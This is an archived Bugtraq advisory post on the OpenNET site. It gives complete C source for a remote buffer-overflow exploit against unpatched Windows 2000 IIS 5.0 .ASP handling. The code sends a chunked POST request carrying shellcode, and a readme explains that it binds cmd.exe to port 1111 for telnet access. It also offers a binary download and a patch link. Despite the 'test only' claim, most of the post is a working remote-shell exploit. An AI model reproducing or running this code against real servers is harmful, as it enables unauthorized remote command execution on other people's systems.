The OpenNET Project / Index page
BSD, Linux, Cisco, Web, Palm, other unix
RUSSIAN version

Search
Хинт: Ссылка в каталоге ПО не работает ? Пожалуйста, сообщите на mc@tyumen.ru и попытайтесь скачать искомую программу с ftp://ftp.opennet.ru.
SOFT - Unix Software catalog
LINKS - Unix resources
TOPIC - Articles from usenet
DOCUMENTATION - Unix guides
News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

Windows 2000 Server IIS 5.0 .ASP Overflow Exploit


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: 4 May 2002 15:42:52 -0000
From: CHINANSL Security Team <lovehacker@chinansl.com>
To: bugtraq@securityfocus.com
Subject: Windows 2000 Server IIS 5.0 .ASP Overflow Exploit



Summary:
========

The following code will allow you to safely test your 
system for the below motioned vulnerability. For more 
information about this vulnerability see 
http://www.eeye.com/html/press/PR20020410.html previous 
article:"windows 2000 and NT4 IIS .ASP Buffer Overflow".
The following code comes from CHINANSL TECHNOLOGY CO.,LTD. 
For more information about our company see 
http://www.chinansl.com.

Exploit:
========

--------------------CUT HERE--------------------------------
/*
Windows 2000 Server Exploit By CHINANSL Security Team.
Test on Windows 2000 Chinese Version, IIS 5.0 , not patched.
Warning:THIS PROGRAM WILL ONLY TEST.
CHINANSL Technology CO.,LTD
http://www.chinansl.com
keji@chinansl.com
*/

#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#pragma comment (lib,"Ws2_32")

int main(int argc, char* argv[])
{
	if(argc != 4)
	{
		printf("%s ip port aspfilepath\n\n",argv
[0]);
		printf("	ie. %s 127.0.0.1 
80 /iisstart.asp\n",argv[0]);
		puts("	programed by keji@chinansl.com");

		return 0;
	}

	DWORD srcdata=0x01e2fb1c-4;//0x00457474;	
		//address of SHELLCODE
	DWORD 
jmpaddr=0x00457494;//0x77ebf094;//0x01e6fcec;//"\x1c\xfb\xe6
\x01";///"\x0c\xfb\xe6\x01";

	char* destIP=argv[1];
	char* destFile=argv[3];
	int webport=atoi(argv[2]);
	char* pad="\xcc\xcc\xcc\xcc"  "ADPA"  "\x02\x02\x02
\x02"  "PADP";				//16 bytes

	WSADATA	ws;
	SOCKET	s;
	long result=0;
	if(WSAStartup(0x0101,&ws) != 0)
	{
		puts("WSAStartup() error");
		return -1;
	}

	struct	sockaddr_in addr;
	addr.sin_family=AF_INET;
	addr.sin_port=htons(webport);
	addr.sin_addr.s_addr=inet_addr(destIP);
	s=socket(AF_INET,SOCK_STREAM,0);
	if(s==-1)
	{
		puts("Socket create error");
		return -1;
	}
	
	if(connect(s,(struct sockaddr *)&addr,sizeof(addr)) 
== -1)
	{
		puts("Cannot connect to the specified 
host");
		return -1;
	}

	char buff[4096];
char* shellcode=

"\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x03\xe0\x8b\xfc\x33
\xc9\x89"
"\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\x65
\x6c\x33\x32"
"\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\x33\x32
\x2e\xab"
"\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\xab\x32
\xc0\x4f"
"\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\x53
\xff\xd0\x89"
"\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\xff\x53
\xff\xd0"
"\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75
\xfc\xff\xd3\x89"
"\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\x33\xf6
\x66\xbe"
"\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66
\xbe\x3e\x02\x56"
"\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\x56
\xff\x75\xfc"
"\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75
\xfc\xff\xd3\x89"
"\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75
\xfc\xff\xd3\x89"
"\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75
\xfc\xff\xd3\x89"
"\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45
\xe0\x6a"
"\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\x75\xf8
\xff\xd3"
"\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\xff\xd3
\x89\x45"
"\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13
\xff\x75\xf8"
"\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45
\xc8\x6a"
"\x03\xff\x75\xf8\xff\xd3\x89\x85
\x1c\xff\xff\xff\x8d\x7d\xa0\x32"
"\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\xc0
\xab\xf7\xd0"
"\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\xc8
\xab\x33\xc0"
"\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50
\xff\x55"
"\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4
\x6a\x10"
"\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75
\xc4\xff"
"\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45
\xc0\x33"
"\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50
\xff\x55"
"\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45
\x94\x50"
"\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44
\x32\xc0"
"\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01
\x89\x47"
"\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89
\x47\x3c"
"\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85
\x38\xff"
"\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51
\x53\xff"
"\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34
\xff\xff\xff\x89"
"\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85
\x2c\xff\xff\xff\x50"
"\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85
\x2c\xff\xff\xff\x85"
"\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85
\x2c\xff\xff\xff\x50\x53"
"\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0
\x74\x6d"
"\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30
\xff\xff\xff\xff"
"\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90
\x90\x90"
"\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90
\x33\xc0"
"\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0
\xff\x55\xc8"
"\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50
\x8d\x85"
"\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30
\xff\xff"
"\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4
\xff\x75\xc4"
"\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95
\x1c\xff\xff\xff\x6a"
"\xff\xff\x95\x18\xff\xff\xff";


		char* s1="POST ";// HTTP/1.1\r\n";
		char* s2="Accept: */*\r\n";
		char* s4="Content-Type: application/x-www-
form-urlencoded\r\n";
		char* s5="Transfer-Encoding: 
chunked\r\n\r\n";
		char* sc="0\r\n\r\n\r\n";

		char shellcodebuff[1024*8];
		memset(shellcodebuff,0x90,sizeof
(shellcodebuff));
		memcpy(&shellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1],shellcode,strlen(shellcode));
		shellcodebuff[sizeof(shellcodebuff)-1] = 0;


	char sendbuff[1024*16];
	memset(sendbuff,0,1024*16);

	sprintf(sendbuff,"%s%s?%s HTTP/1.1\r\n%sHost: %
s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%
s",s1,destFile,shellcodebuff,s2,destIP,s4,s5,pad/*,srcdata,j
mpaddr*/,sc);


	int sendlen=strlen(sendbuff);
    *(DWORD *)strstr(sendbuff,"BBBB") = jmpaddr;
	*(DWORD *)strstr(sendbuff,"AAAA") = srcdata;

	result=send(s,sendbuff,sendlen,0);
	if(result == -1 )
	{
		puts("Send shellcode error!");
		return -1;
	}

	memset(buff,0,4096);
	result=recv(s,buff,sizeof(buff),0);

	if(strstr(buff,"<html>") != NULL)
	{
		shutdown(s,0);
		closesocket(s);

		puts("Send shellcode error!Try again!");
		return -1;
	}
	

	shutdown(s,0);
	closesocket(s);
	printf("\nUse <telnet %s 1111> to connect to the 
host\n",destIP);
	puts("If you cannot connect to the host,try run 
this program again!");

  return 0;
}
---------------------------End------------------------------

Readme:
=======

    This .asp overflow exploit will open port 1111 and bind 
the cmd.exe.One thing should be noted is that everytime you 
run this exploit and a message will show that this exploit 
works perfectly,but that doesn't mean you can get the 
access to the target host,the reason is that on some 
occasions there will be a message-box appear on victim's 
terminal screen showing that an AV(Accesee Violation) has 
occured.anyhow,this dialog should be closed by recipient 
otherwise you can not gaining the access even if you 
continue your attack.

Download:
=========

    http://download.chinansl.com/aspexploit.exe

Solution:
=========

    patch:http://www.microsoft.com/Downloads/Release.asp?
ReleaseID=37824

Reference:
==========

  Copyright 2001-2002 CHINANSL. All Rights Reserved.
  This Information comes from CHINANSL TECHNOLOGY 
CO.,LTD. It can be transshipped. But please guarantee the 
completion of the article, otherwise we will pursue the 
rights of the law.
  www.chinansl.com 
  lovehacker@chinansl.com 


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Закладки
Добавить в закладки
Created 1996-2003 by Maxim Chirkov  
ДобавитьРекламаВебмастеруЦУПГИД  
SpyLOG TopList
RB2 Network.
RB2 Network.